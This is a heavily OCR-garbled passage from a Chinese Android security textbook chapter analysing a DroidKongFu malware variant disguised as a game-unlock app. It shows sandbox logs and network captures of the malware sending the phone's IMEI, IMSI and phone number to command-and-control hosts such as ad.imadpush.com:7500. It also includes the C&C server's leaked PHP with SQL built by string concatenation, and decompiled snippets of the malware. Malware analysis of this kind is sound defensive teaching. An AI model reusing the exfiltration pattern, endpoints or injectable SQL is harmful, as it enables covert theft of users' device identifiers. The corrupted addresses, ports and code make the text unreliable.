图 12-1 DroidKongFu 变 种 病毒 程序 


当 用 户 安 装 游戏 解锁 软件 并 运行 后 ， 软 件 中 被 植 入 的 Java 代 人 码 就 会 
执行 Native 层 的 病毒 主体 ， 病 毒 主体 进而 感染 手机 系统 、 算 改 系统 文 
件 ， 连 接 远程 的 C&C (Command && Control， 远 程 命令 与 控制 ) 服务 器 
并 接受 控制 指令 。 








] 隘 


引信 ~ 
呈 











DroidKongFu 变 种 病毒 样本 在 本 书 配 套 源 代码 中 以 加 密 压 缩 包 的 形式 提供 ， 解 压 密码 
为 “virus”"。 该 病毒 样本 具有 系统 破坏 性 ， 读 者 切 勿 在 手机 中 安装 运行 ， 否 则 ， 带 来 的 一 切 后 果 
由 读者 自行 承担 。 























12.2 ”配置 病毒 分 析 环 境 


本 章 分 析 DroidKongFu 变 种 病毒 时 用 到 以 下 工具 : 

e Ubuntu: 本 章 采 用 32 位 的 Ubuntu 12.04 作 为 分 析 病 毒 时 使 用 的 操 
作 系 统 。 

e Android SDK: Android 软 件 开 发 必 备 。 本 章 主 要 使 用 其 中 的 
DDMS 查 看 日 志 输 出 ， 使 用 Emulator 运 行 Android 模 拟 器 。 

e ApkTool、dex2jar、jd-gui: 反 编 译 工 具 集 。 前 面 曾 多 次 使 用 





e DroidBox: Android 程 序 动态 分 析 工 具 。 
e APIMonitor，DroidBox 中 提供 的 另 一 款 Android 程 序 动态 分 析 工 


e IDA Pro: 静态 分 析 病 毒 Native 人 代码。 
e Bless Hex Editor: 十 六 进 制 编辑 工具 。 查 看 与 编辑 Android 原 生 





DroidBox 是 一 款 开 源 的 Android 程 序 动态 分 析 工 具 。 它 能 够 对 
Android 程 序 进行 监控 分 析 ， 监 控 的 内 容 包括 : 

分 析 程 序 包 的 Hash 值 。 

进出 的 网 络 数据 。 

文件 读 写 操作 。 

使 用 DexClassLoader 启 动 的 服务 与 类 ，。 

言 息 泄 漏 ， 包 括 网 络 、 文 件 与 短 消息 。 

危险 的 应 用 程序 权限 。 

被 调用 的 Android 加 密 类 API。 

列举 所 有 的 广播 接收 者 。 

发 出 的 短 消息 与 通话 记录 。 


分 析 病 毒 时 使 用 的 操作 系统 是 依照 DroidBox 的 运行 平台 来 选择 的 ， 
DroidBox 依 赖 2.7 版 的 Python，Ubuntu 10.04 自 带 的 Python 2.6 无 法 满足 要 
求 ， 因 此 笔者 选择 了 Ubuntu 12.04 作 为 DroidBox 的 运行 环境 。DroidBox 
的 安装 比较 简单 。 首 先 到 http://code.google.com/p/droidbox 下载 DroidBox 
软件 包 ， 目 前 最 新 的 版 本 为 Android 2.3 Beta， 文 件 名 为 
DroidBox23.tar.gz， 下 载 后 将 其 解压 到 任意 目录 ， 然 后 在 终端 提示 符 下 
执行 以 下 命令 安装 DroidBox 运 行 所 需要 的 依赖 软件 包 。 


sudo apt-get install python-numpy python-scipy python-matplotlib 


依赖 软件 包 安 装 完成 后 ，DroidBox 束 算 配 置 好 了 。 

APIMonitor 是 另 一 款 独 立 的 动态 分 析 工 具 ， 需 要 从 
http:/code.google.com/p/droidbox/ 单 独 下 载 。 目 前 最 新 版 本 为 beta2， 文 
件 名 为 APIMonitor-beta2.tar.gz。 按 照 上 面 的 步骤 安装 好 DroidBox 运 行 环 
境 后 ，APIMonitor 就 不 需要 做 其 它 配 置 工作 了 ， 下 载 解压 后 即 可 直接 使 
用 。 

IDA Pro 可 以 使 用 官方 提供 的 6.2 演 示 版 或 购买 商业 版 ， 使 用 演示 版 
的 不 足 是 无 法 保存 分 析 后 的 idb 数 据 库 文件 。 

Bless Hex Editor 是 Linux 平 台 一 球 十 六 进 制 编辑 工具 ， 本 章 在 提取 
分 析 DroidKongFu 病 毒 的 核心 程序 时 使 用 到 它 。 它 的 安装 方法 很 简单 : 
打开 Ubuntu 软件 中 心 ， 搜 索 “Bless Hex Editor” 后 直接 点 击 安装 即 可 。 














12.3 ”病毒 执行 状态 分 析 


病毒 分 析 讲究 先 动 后 静 的 分 析 步 又。 首先， 使 用 动态 分 析 捕获 病毒 
执行 的 所 有 敏感 操作 ， 观 察 病毒 运行 时 的 症状 ， 在 了 解 病毒 实现 的 " 功 
能 "后 ， 再 使 用 静态 分 析 技术 逆向 病毒 的 功能 代码 ， 理 清 病毒 的 执行 路 
线 ， 最 终 理解 病毒 实现 的 全 过 程 。 





12.3.1 使 用 APIMonitor 初 步 分 析 








APIMonitor 是 新 版 DroidBox 加 入 的 工具 ， 它 的 原理 是 癌 目 标 apk 文 
件 中 插入 桩 代码 ， 实 现 对 特定 API 的 监控 。 使 用 它 的 好 处 是 重新 打包 后 
的 程序 可 以 在 Android 设 备 或 模拟 器 中 直接 运行 ， 分 析 人 员 只 需要 奉 看 
Tag 标 记 为 “DroidBox” 的 日 志 信 息 即 可 。 

将 解压 后 的 virus.apk 放 到 APIMonitor 工 具 的 目录 下 ， 然 后 在 终端 提 
示 符 下 进入 该 目录 执行 命令 : 

./apimonitor.py ./vVvirus.apk 


会 输出 如 下 信息 : 


./apimonitor.py ./virus.apk 

min_sdk_version=4 

target_sdk_version=4 

Parsing ./apimonitor_out/origin_ smali... 

Done ! 

Loading and processing API database... 

Target API Level: 4 

[Warn] Inferred API: Landroid/content/Context;->sendBroadcast 

[Warn] Method not found in API-4 db: Landroid/content/ContextWrapper; 
->sendSstickyOrderedBroadcast 

[Warn] Method not found in API-4 db: 

Landroid/content/ContextWrapper;->startActivities 

[Warn] Inferred API: Ljava/io/Writer;->append 

Done ! 

Injecting,.. 

Done! 

Saving ./apimonitor out/new_smali... 

Done 

NEW APK: ./virus_new.apk 


打包 完成 会 生成 virus_new.apk 文 件 ， 现 在 只 需要 安装 这 个 apk 然 后 
运行 即 可 。 在 终端 提示 符 下 执行 命令 “emulator -avd android2.3.3” 启 动 模 
拟 器 (读者 可 根据 实际 情况 启动 自己 设置 的 模拟 器 〉， 然 后 执行 以 下 命 
令 安 装 打 包 后 的 DroidKongFu 病 毒 样本 : 


adb install ./virus_ new.apk 


安装 完成 后 点 击 模 拟 器 上 的 “Cut The Rope Unlock” 图 标 ， 运 行 病毒 
样本 ， 然 后 打开 DDMS， 添 加 Tag 标 签 为 “DroidBox” 的 监视 过 滤器 ， 输 
出 的 信息 如 图 12-2 所 示 。 

















Dalvik Debug Monitor 


目 贸 四 [总 雹 | 党 vO Info | Threads | VM Heap | Allocation Tracker Sysinfo | Network '?* 
DDM-aware? yes 
Name ee 
TU I ITI CHT ery En UU App description: com.tebs3.cuttherope 
com.android.launcher | 127 入 | 86- VM version: Dalvik v1.4.0 
androld.process.medla i214 : 鸟 ! 86 Process ID: 361 
让 i i i 
com.android.music 急 | i ISupports Profiling Control: Yes 










com.trebs3.cuttherope Supports HPROF Control:. Yes 


com.android.systemui 





SavedTrilters 十 一 |verbose ;| |s| 鼠 操 | 4 


All messages (no filt 


€ PID Application Tag Text 


DroldBox = oo op eo CJA or opermeeormreeceormercyecrocrmrce 
y.luni.internal.net .www.protocol .http.Htt 
push.com:7588/AppManager/index.php/user/r 

V 361 com.Lebs3.cultherope DroidBox Ljava/net/URL;-><init>(Ljava/lang/Sstring; 
anager/index.php/user/register/register)y 
V | 361 com.tebs3.cuttherope DroidBox Ljava/net/URL;->openConnection()Ljava/net 
y.luni.internal.net .www.protocol.http.Htt 
push.com:75060/AppManager/index.php/user/r 
V 361 com.tebs3.cuttherope DroidBox Ljava/net/URL;-><init>(Ljava/lang/String; 
anager/index.php/AppPoster/mgPush/getPust 
V 361 ‘com.tebs3.cuttherope DroidBox Ljava/net/URL;->openConnection()Ljava/ne 
y.luni.internal.net ,www.protocol .http.Ht 
push .com:7569/AppManager/Vindex.php/VAppPo 








图 12-2 ”使 用 APIMonitor 动 态 分 析 程 序 


何 于 放 作 全 有 在 有 全 全 全 内 容 ， 笔 者 使 用 命令 行 方式 来 列 出 Tag 标 
签 为 “DroidBox” 的 日 志 人 信息， 执行 “adb logcat -s DroidBox:V” 后 结果 输出 


计 息 如 下 为 了 便于 排版 ， 笔 者 删除 了 每 行 信息 开头 的 字符 
串 “V/DroidBox(361):”) 





adb logcat -S DroidBox:V 
Landroid/telephony/TelephonyManager;->getDevicelId()Ljava/lang/string;=000 
000000000000 
Landroid/telephony/TelephonyManager;->getSubscriberIlid()Ljava/lang/Sstring; 
=310260000000000 
Landroid/telephony/TelephonyManager;->getDevicelId()Ljava/lang/string;=000 
000000000000 
Landroid/telephony/TelephonyManager;->getSubscriberid()Ljava/lang/String; 
=310260000000000 
Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/string;=000 
000000000000 
Landroid/telephony/TelephonyManager;->getSubscriberIid()Ljava/lang/string; 
=310260000000000 
Ljava/security/MessageDigest;->getInstance(Ljava/lang/string;=MDS)Ljava/s 
ecurity/MessageDigest;=MESSAGE DIGEST MD5 
Ljava/security/MessageDigest;->update( [B={48, 48, 48, 48, 48, 48, 48, 48, 48, 
48, 48, 48, 48, 48, 48})V 

Ljava/security/MessageDigest;->digest() [B={82, -124, 4, 127, 79, -5, 78, 4, -126, 
747 47; -47; -471, -16,; -51; 98} 
Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/Sstring;=000 
000000000000 

Landroid/telephony/TelephonyManager; ->getSubscriberId()Ljava/lang/string; 
=310260000000000 

Landroid/telephony/TelephonyManager; ->getDeviceId()Ljava/lang/sString;=000 
000000000000 

Landroid/telephony/TelephonyManager; ->getSubscriberIid()Ljava/lang/string; 
=310260000000000 
Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/string;=000 
000000000000 

Landroid/telephony/TelephonyManager; ->getSubscriberId()Ljava/lang/string; 
=310260000000000 
Landroid/content/Intent;-><init>(Landroid/content/Context;=com.tebs3.cutt 
herope.MainActivity@405178c0 | Ljava/lang/Class;=class 
ad.imadpush.com.poster.ReceiverAlarm)V 
Landroid/content/Intent;-><init>()V 
Landroid/content/Intent;-><init>(Landroid/content/Context;=android.app.Re 
ceiverRestrictedContext@4055c978 | Ljava/lang/Class;=class 
ad.imadpush.com.poster.AlarmService)yv 


Landroid/telephony/TelephonyManager; ->getDeviceId()Ljava/lang/Sstring;=000 
000000000000 

Ljava/net/URL;-><init> (Ljava/lang/string;=http://ad.imadpush.com:7500/App 
Manager/index.php/user/register/register)yv 
Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/Sstring;=000 
000000000000 

Ljava/net/URL; ->openConnection()Ljava/net/URLConnection;=org.apache.harmo 
ny.luni.internal .net .www.protocol .http.HttpURLConnectionImpl :http://ad.im 
adpush.com:7500/AppManager/index.php/user/register/register 
Ljava/net/URL;-><init> (Ljava/lang/String;=http://ad.imadpush.com:7500/App 
Manager/index.php/user/register/register)VyV 
Ljava/net/URL;->openConnection()Ljava/net/URLConnection;=org.apache .harmo 
ny.luni.internal.net .www.protocol.http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/user/register/register 
Ljava/net/URL; -><init> (Ljava/lang/string;=http://ad.imadpush.com:7500/App 
Manager/index.php/AppPoster/mgPush/getPush)V 
Ljava/net/URL;->openConnection{()Ljava/net/URLConnection;=org.apache.harmo 
ny.luni.internal.net .www.protocol.http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/AppPoster/mgPush/getPush 
Landroid/content/Intent;-><init>(Landroid/content/Context;=android.app.Re 
ceiverRestrictedContext@4055c978 | Ljava/lang/Class;=class 
ad.imadpush.com.poster.AlarmService)yv 

Ljava/net/URL;-><init> (Ljava/lang/string;=http://ad.imadpush.com:7500/App 
Manager/index.php/AppPoster/mgPush/getPush)V 

Ljava/net/URL; ->openConnection()Ljava/net/URLConnection;=org.apache.harmo 
ny.luni.internal .net .www.protocol .http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/AppPoster/mgPush/getPush 
Landroid/content/Intent;-><init>(Landroid/content/Context;=android.app.Re 
ceiverRestrictedContext@4055c978 | Ljava/lang/Class;=class 
ad.imadpush.com.poster.AlarmService)y 

Ljava/net/URL; -><init> (Ljava/lang/String;=http://ad.imadpush.com:7500/App 
Manager/index.php/AppPoster/mgPush/getPush)V 

Ljava/net/URL; ->openConnection()Ljava/net/URLConnection;=org.apache.harmo 
ny.luni.internal .net .www.protocol.http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/AppPoster/mgPush/getPush 


从 上 面 的 信息 看 出 ， 该 病毒 执行 了 如 下 的 动作 : 

e 获取 手机 敏感 数据 : 调用 getDeviceId0 获 取 设 备 的 IMEI， 调 用 
getSubscriberId() 获 取 设 备 的 IMSI。 

e 注册 了 广播 接收 者 : ad.imadpush.com.poster.ReceiverAlarm。 

e 启动 了 服务 : ad.imadpush.com.poster.AlarmService。 





e 访问 了 网 站 : 
http://ad.imadpush.com:7500/AppManager/index.php/user/register/register 

http://ad.imadpush.com:7500/AppManager/index.php/AppPoster/mgPus 
h/getPush 

笔者 在 浏览 器 中 访问 第 2 个 网 址 ， 打 开 后 的 界面 如 图 12-3 所 示 。 


PHP notice - Mozilla Firefox 


[PHP notice 





< imadpush.com:75f -@| | Q 合 


TVaITWWWIIOIUAPDPIIIGUeDPIOEeECEeOIIOUUIeSTIADPFUSUeETCOIUUIOUEITSTVIOFUSIUCONUOUEIDOPUIST 


public function actionUpdatePush() { 
$inei = $ POST ['uid']; 
$sql = "update mg user Set ispush=g where IMEI = " . $imei; 
$result = selectBySql ($sql); 
echo $result; 
} 


半 半 

* 获得 下 发 广告 

六 

public function actionGetPush() { 


$dId = $ POST ['dId']; 
if (isset($dId)) { 
if ($dId == '654321') { 





$imei = 和 POST ['imei']; 
$res = SeLectBySqL("SeLect * from mg user where IMEI = '" . $imei . "'"); 
$ispush = $res [0] ['ispush']; 


if ($ispush == 9) { 
return; 


} 
// 请 求 广告 
$sql = "select * from mg push where id=68"; 
Stack Trace 
#0 [lVar/www/html/yii/framework/web/actions/CInlineAction.php(50): MgPushController>actionGetPushl) 


#1 [4 /var/www/html/yii/framework/web/CController.php(309): CInlineAction->runWithParams(array()) 





#2 [4 /Var/www/html/yii/framework/web/filters/CFilterChain.php(134): CController->runAction(CInlineAction) 


图 12-3 访问 病毒 广告 页 面 


这 上 段 PHP 代 码 是 请 求 apk 广 告 ， 而 且 还 是 Push 广 告 ， 因 为 缺少 传递 
dId 参 数 ， 造 成 页 面 请 求 错误 并 打印 出 了 栈 跟 踪 信 息 。 

通过 以 上 收集 到 的 信息 ， 我 们 可 以 初步 判断 该 程序 伪 取 用 户 隐私 信 
轧 ， 并 且 访 问 广 告 网 站 获取 Push 三 告 程序 。 但 这 些 信 息 还 不 足以 理解 病 
毒 的 完整 运作 过 程 ， 如 病毒 体 的 释放 、 系 统 目录 的 读 写 等 操作 ， 下 一 小 
节 我 们 将 使 用 DroidBox 来 动态 分 析 它 。 


12.3.2 ”使 用 DroidBox 动 态 分 析 


DroidBox 提 供 了 startemu.sh 与 droidbox.sh 两 个 脚本 程序 ， 前 者 用 于 
启动 一 个 专用 于 Android 动 态 分 析 的 模拟 器 实例 ， 后 者 用 于 执行 具体 的 


apk 动 态 分 析 。 

首先 创建 一 个 AVD， 笔 者 在 此 直接 使 用 了 上 一 小 节 的 模拟 器 《名 称 
为 android2.3.3) 。 然 后 在 终端 提示 符 下 执行 以 下 命令 局 动 DroidBox 分 析 
环境 : 

./startemu.sh android2.3.3 

局 动 完成 后 执行 以 下 命令 开始 动态 分 析 病 毒 样本 : 

./droidbox.sh ./virus.apk 

droidbox.sh 脚 本 只 有 一 个 参数 ， 那 就 是 apk 文 件 名 。 命 令 执 行 后 会 进 
入 DroidBox 运 行 界面 ， 如 图 12-4 所 示 ，DroidBox 会 自动 收集 中 间 运 行 结 
果 ， 这 个 过 程 可 能 很 慢 ， 读 者 可 以 在 模拟 器 中 点 击 病毒 程序 图 标 来 让 
DroidBox 快 速 收 集 更 多 信息 。 


~ 























feicong@feicong-ubuntu12: ~/tools/DroidBox23 
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图 12-4 ”DroidBox 运 行 界面 
等 到 “Collected xx sandbox logs” 信 息 显 示 的 数值 长 时 间 不 发 生变 化 


时 ， 按 下 CTRL+C 结 束 DroidBox 的 运行 。 此 时 DroidBox 会 输出 所 有 采集 
到 的 信息 ， 笔 者 在 此 列 出 部 分 信息 如 下 : 


File name: ./virus.apk 


MD5 : 
SHA1: 
SHA256: 


Duration: 


45f86e5027495dc33d168f4f4704779c 
6564c212e42c61c7c0e622abb96d1lfd0f7980014 
dc8ca477283c41ff8d4a2bb318f3a9aea426767c8cle44b 
db725ef5e63b65345 


[File activities] 


woeses 


[10.6619420052] 
shared_ prefs/jmuser .xml 


[14. 


5037009716] 


.0767269135] 
.6161949635] 
.3806829453] 
.7169969082] 
.9263288975] 
.7892029285] 
.8003950119] 
.9976928234] 
.2044019699] 


376241929] 
.782448053] 
.996846914] 
.208056927] 
.440768957] 
.686179876] 


[Outgoing traffic] 


16.534528017s 


Path: 


Path: 


/data/data/com.tebs3.cuttherope/ 


/data/data/com.tebs3.cuttherope/lib/ 


tmp-622898097tmp 


Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 


180.210.34.207 Port: 7500 
T80230:34.207 Pot 7500 
22151305L7N37 Ports ‘30 
2 LTI TT Pert ,80 
ad.imadpush.com Port: 7500 


58.221.44.102 Port: 7500 
localhost Port: 123 

221 .01305T77.7 Ports 80 
Zl 1l30. LI .7 Ports A0 
2 30 ENT BORES “0 
学 
ZOLsTS3OuL7T Ys RoEE: 80 
221.130 TTI. Parte 80 
Z2EAL30aTIT TT Port: “8 
221 .330.177. 7 Ports ‘80 


[11.3436820507] Destination: 180.210.34.207 Port: 7500 
Data: GET /ad/nadp.php?v=1.5&id=all HTTP/1.1 
Host: dd.phonego8.com:7500 
Connection: Keep-Alive 
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) 


[12.2810199261] Dastinationms 221:130.177 .8 EGG 80 
Data: GET /mst.htm?version=2.3.6 HTTP/1.1 
Connection: Close 


Host: amob.acs86.com 


[Incoming traffic] 


[11.4650139809] Sources 180.2102342207 BPort: 7500 
Data: HTTP/1.1 200 OK 


[11.9140660763] Source: 180.210.34.207 Port: 7500 
Data: HTTP/1i.1 200 OK 


[DexClassLoader] 


10.8419530392 Class: com.airpuh.ad.UpdateCheck 
11.0423948765 Class:ad.imadpush.com.poster.AlarmService 
11.0516819954 Class:ad.imadpush.com.poster.AlarmService 


[Enforced permissions] 


[LF1.7492880821] Sink: Network 
Destination: 180.210.34.207 
EOLtEs ISO 
Tag: TAINT_ IMETI 
Data: GET /ad/nadp .php?v=1 .5&id=CHNF&u=357242043237517 
HTTP/1.1 Host: dd.phonego8.com:7500 Connection: Keep-Alive 


[12.9422860146] Sink: Network 
Destinations 221.6130.177%8 
Port: 80 


Tag: TAINT PHONE NUMBER, TAINT_IMET 
Datas GET Aas htmPue 


[31..53555703.6] Sink: Network 
Destination: 58.221.44.102 
Port: 7500 


Tag: TAINT_IMEI 
Data: POST /AppManager/index.php/user/register/register 
HTTP/1.1 Content-Length: 136 Content-Type: application/ 
xX-www-form-urlencoded Host: ad.imadpush.com:7500 Connection: 
Keep-AMAlive User-Agent: Apache-HttpClient/UNAVAILABLE 
(java 1.4) imei=357242043237517&packagename=com.tebs3. 
cuttherope&tversionname=1.1.5&versioncode=6&IMEI= 
357242043237517&login way=l&user detal info=1 


[Sent SMS] 


Saved APK behavior graph as: behaviorgraph.png 
Saved treemap graph as: tree.png 


DroidBox 的 输出 结果 比 APIMonitor 要 详细 得 多 。 首 先是 文件 操作 部 
分 ，DroidBox 监 控 到 了 病毒 向 程序 shared_prefs 目 录 下 写 入 了 jmuser.xml 
文件 ， 并 向 lib 目 录 下 写 入 tmp-622898097tmp 文 件 。 后 者 根据 经 验 可 以 初 
步 判 断 是 一 个 随机 生成 的 文件 名 。 


在 网 络 连接 报告 中 显示 程序 连接 了 以 下 3 个 IP 地 址 : 
180.210.34.207: 7500 
2 


ad.imadpush.com (58.221.44.102) : 7500 








输出 通信 (Outgoing traffic) 显示 连接 了 180.210.34.207 与 
221.130.177.8 两 个 IP 地 址 。 

输入 通信 (Incoming traffic) 显示 连接 了 180.210.34.207。 

DroidBox 未 检测 到 广播 接收 者 。 但 检测 到 启动 的 服务 中 ， 除 了 
AlarmService 外 ， 还 多 了 APIMonitor 漏 挥 的 com.airpuh.ad.UpdateCheck。 

最 后 是 信息 泄露 (Information leakage) ，DroidBox 综 合 收集 到 的 信 
居 ， 发 现 了 三 处 信息 泄露 。 信 息 的 接收 端 (Sink) 均 来 日 网络。 泄漏 的 
内 容 为 每 条 信息 的 Tag 标 记 : TAINT_PHONE_NUMBER (手机 号 码 ) 、 
TAINT_IMEI《〈 手 机 IMEI) 。 从 最 后 一 条 信息 泄露 的 内 容 来 看 ， 程 序 除 
了 发 送 手机 的 IMEI 外 ， 还 发 送 了 程序 包 名 (packagename) 、 版 本 号 

(versionname) 、 版 本 代码 (versioncode) 。 

言 息 报 告 完 后 会 自动 生成 behaviorgraph.png 与 tree.png 两 个 图 像 文 
件 ， 两 者 分 别 采 用 时 序 图 与 树 图 的 方式 显示 了 DroidBox 记 录 的 所 有 操 
作 。 


12.3.3 其它 动态 分 析 工 具 

















DroidBox 虽 然 功 能 强大 ， 但 如 果 只 是 偶尔 分 析 一 下 程序 ， 下 载 安 装 
如 此 大 的 工具 就 显得 太 耗 费时 间 了 。 人 笔者 在 此 介绍 一 款 Android 程 序 在 
线 动态 分 析 工 具 Mobile Sandbox 〈 手 机 沙 盒 ， 沙 盒 是 一 个 程序 虚拟 运行 
环境 ，DroidBox 就 是 采用 的 这 种 技术 ) ， 该 工具 本 来 是 MobWorm 项 目 
的 一 部 分 ， 现 在 被 提取 出 来 专门 用 于 在 线 Android 软 件 的 静态 与 动态 分 
析 ， 目 前 该 工具 由 德国 技术 人 员 Michael Spreitzenbarth 维 护 ， 网 址 为 
http://mobilesandbox.org/， 打 开 网 站 界面 如 图 12-5 所 示 。 











Mobile-Sandbox - Mozilla Firefox 


fp Mobile-Sandbox 


和 |@ mobilesandbox.org 


Mobile Sandbox Home 


等 = 


Mm N=,< 








Browse... 


Submit Sample File Sample /mnt/shared/Temp/Android KungFuvariant com.tebs3.cuttherope_6 
Piovide arl Arroid applica 1 站 


Sandbox- Analysis Options ”图 others can view this report 


Delete sample after analysis (Note: You must provide an email address) 


Email Notiiication 


Send File Cancel 


图 12-5 ”在线 沙 盒 


点 击 页 面 上 的 Browse 按 钮 选择 要 分 析 的 apk 文 件 ， 然 后 点 击 Send 
File 上 传 文件 ， 上 传 完成 后 页 面 会 显示 apk 文 件 的 MD5 值 ， 等 待 一 段 时 间 
《程序 较 小 的 话 大 概 半分 钟 就 够 了 ) 后 ， 在 页 面 右 上 角 的 Search 文 本 框 
中 输入 文件 的 MD5 值 后 按 回 车 键 搜索 在 线 分 析 的 结果 《〈 本 实例 样本 程序 
的 MD5 值 为 : 45f86e5027495dc33d168f4f4704779c) ， 如 果 搜 索 到 的 信 
恩 显 示 分 析 状 态 为 Done， 则 说 明 分 析 完 成 了 ， 效 果 如 图 12-6 所 示 。 
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图 12-6 ”样本 已 经 分 析 完 成 


点 击 页 面 上 的 apk 文 件 名 查看 分 析 结 果 。 在 结果 页 面 可 以 发 现 有 
static analyzer 与 dynamic analyzer 两 种 分 析 报 告 。static analyzer 为 静态 分 
析 ， 这 种 分 析 结 果 提 供 了 apk 文 件 使 用 到 的 组 件 、 权 限 、 方 法 调用 等 信 
息 ， 这 些 信息 通过 反 编 译 apk 文 件 可 以 直接 看 到 ; dynamic analyzer 为 动 
态 分 析 ， 采 集 信息 的 原理 与 DroidBox 类 似 ， 报 告 的 结果 也 大 同 小 异 。 点 
击 页 面 上 的 dynamic analyzer V1 链接 打开 动态 分 析 报 告 页 面 ， 如 图 12-7 
所 示 ，Mobile Sandbox 报 告 的 分 析 结 果 与 DroidBox 相 差 无 几 。 


Mobile-Sandbox - Mozilla Firefox 
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图 12-7 Mobile Sandbox 动 态 分 析 结 果 


除了 报告 静态 分 析 与 动态 分 析 结 果 外 ，Mobile Sandbox 还 对 部 分 程 
序 报告 以 下 内 容 : 

e APK Info: apk 文 件 的 包 名 与 压缩 包 中 所 有 文件 的 层次 结构 。 

e Screenshots: 程序 运行 界面 截图 。 

e PCAP Analysis: PCAP 网 络 数 据 包 分 析 。 内 容 比 DroidBox 还 详 
细 。 

e ltrace Output: 报告 原生 函数 库 的 调用 情况 。 











12.4 病毒 代码 赣 癌 分 析 


通过 前 面 的 分 析 ， 我 们 已 经 初步 掌握 了 病毒 调用 的 系统 敏感 API 以 
及 泄露 的 信息 。 从 本 节 开 始 ， 我 们 将 采用 静态 分 析 的 方法 来 对 病毒 的 关 
键 代码 进行 逐 行 的 分 析 。DroidKongFu 通 过 Java 层 的 Native 函 数 来 启动 病 
毒 外 党 ， 然 后 由 病毒 外 这 来 启动 真正 的 病毒 主体 ， 本 市 主要 从 Java 层 、 
Native 启 动 层 、Native 核 心 层 等 三 个 方面 来 着 手 对 DroidKongFu 变 种 病毒 
有 


12.4.1 Java 层 启动 代码 分 析 


首先 反 编 译 样 本 程序 virus.apk。 在 终端 提示 符 下 依次 执行 以 下 命 

















apktool Q ./virus.apk 


dex2jJar.sh ./virus.apk 

有 反 编 译 完成 后 打开 virus 目 录 下 的 AndroidManifest.xml 文 件 ， 可 得 到 
如 下 信息 : 

e 程序 包 名 为 com.tebs3.cuttherope， 版 本 1.1.5。 

e 程序 有 2 个 Activity: MainActivity 与 
ad.imadpush.com.poster.PosterInfoActivity， 其 中 前 者 为 主 Activity。 

e 程序 有 两 个 元 数据 : MYAD_PID 与 ad.imadpush.com， 取 值 分 别 
为 NCuttherope 与 100001。 

e 程序 有 2 个 Service: com.airpuh.ad.UpdateCheck 与 
ad.imadpush.com.poster.AlarmService。 

e 程序 有 1 个 BroadcastReceiver: 


ad.imadpush.com.poster.ReceiverAlarm 。 











e 程序 使 用 到 以 下 权限 : 

<uses-permission android:name="android.permission.INTERNET"/> 
<uses-permission android:name="android.permission.ACCESS_ NETWORK_STATE"/> 
<Uses-permission android:name="android.permission.ACCESS WIFI_STATE"/> 
<uses-permission android:name="android.permission.READ PHONE_STATE"/> 


<uses-permissionandroid:name="android.permission.ACCESS _ COARSE LOCATION"/> 
执行 命令 “jd-gui ”./virus_dex2jar.jar” 使 用 jd-gui 打 开 转 换 成 功 的 jar 文 
件 ， 定 位 到 MainActivity 类 的 OnCreate0 方 法 处 ， 如 图 12-8 所 示 。 






Java Decompiler - MainActivity.class 
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> 四 1 | MainActivity.class BH = 
- -| 
* 国 n public void onCreate(Bundle paramBundle) 

> 岂 uil { 

v 册 com super .onCreate(paramBundle); 
| setContentView(2138983848); 

” 册 airpuh.ad if (!isPhoneRooted(this)) 
Pp 国 UpdateCheck$1 { 
pb [DD UpdateCheck Toast .makeText(getApplicationContext(), “Device not rooted?\nPlease refund this app - root is require 








* 出 izpviews this. root = false; 
侈 en3 this._unlockButton = ((Button)findViewById(2131934113)); 
* 出 battery this. unlockButton.setOnClicklListener(new MainActivity.1(this)); 
Y 岂 cuttherope this. startButton = ((Button)findViewById(2131834114)); 
» 国 MainActivity$1 this. startButton.setOnClickListener(new MainActivity.2(this)); 
Ea > ((ImageView)findViewById(2131834116)).setOnClickListener(new MainActivity.3(this)); 
Ns this md = new WenAd(this); 
p> 国 MainActivity$3 a 启动 广告 接收 线程 
” 症 
> 国 R 





localIntent .setClass(this, ode class)i| 启动 恶 章 服务 


startService(localIntent); 

















图 12-8 MainActivity 的 OnCreate() 方 法 





病毒 在 MainActivity 初 始 化 时 ， 做 了 以 下 三 件 事 。 

1. 启动 广告 接收 线程 

程序 在 OnCreate() 方 法 中 启动 了 一 个 线程 循环 的 接收 广告 。 启 动 线 
程 的 代码 为 : 

this.maAd2 = new Newad (this),; 

this.madq2 .StartRad( ) ; 

NewAd 从 名 称 上 就 可 以 判断 是 与 AD“〈 广 告 ) 相关 的 类 ， 第 一 行 代 
码 实 例 化 了 一 个 NewAd 对 象 ， 第 二 行 代 码 调用 了 它 的 startAd() 方 法 。 
NewAd 类 的 构造 函数 初始 化 了 一 些 对 象 ， 这 里 我 们 不 去 深究 ， 主 要 查看 


其 startAd0) 方 法 ， 代 人 码 如 下 : 


public void startAd!() 
{ 
new g(this) .start(); 


startAd0 新 建 了 一 个 g 对 象 并 调用 了 它 的 start() 方 法 。 点 击 字 母 g 的 链 
接 跟 踪 g 类 的 代码 ， 发 现 它 继承 自 Thread， 原 来 是 一 个 线程 类 。 有 过 
Android 软 件 开发 经 验 的 读者 应 该 都 知道 ，Thread 对 象 的 start() 方 法 执行 
的 是 它 的 run() 方 法 ， 我 们 继续 得 看 其 run() 方 法 ， 代 但 如 下 : 


public void runl() 
{ 


while (true) 


if (Newad.a(this.al)) // 调 用 NewAG 类 的 静态 方法 a ( ) 
return; 
NewAd.b (this.a); // 调 用 Newad 类 的 静态 方法 b ( ) 
CE 
{ 
sleep (5000L); / /线程 睡眠 5 秒 


} 
catch (InterruptedException localInterruptedException) 
{ 
} 
} 








} 
这 是 一 段 循环 代码 ， 主 要 调用 了 NewAd 类 的 a0 方 法 与 b0 方 法 ， 这 
两 个 方法 都 是 虚构 合成 (static _ synthetic) 的， 在 jd-gui 中 找 不 到 它们 的 
声明 ， 使 用 gedit 编 辑 器 打开 反 编 译 出 的 NewAd.smali 文 件 ， 发 现 其 声明 
代码 如 下 : 


.method static Synthetic a{(lLcom/tebs3/battery/NewAd;)zZ 
-Locals 1 
iget-boolean v0, p0, Lcom/tebs3/battery/NewAd;->a:Z 
return v0 
.end method 
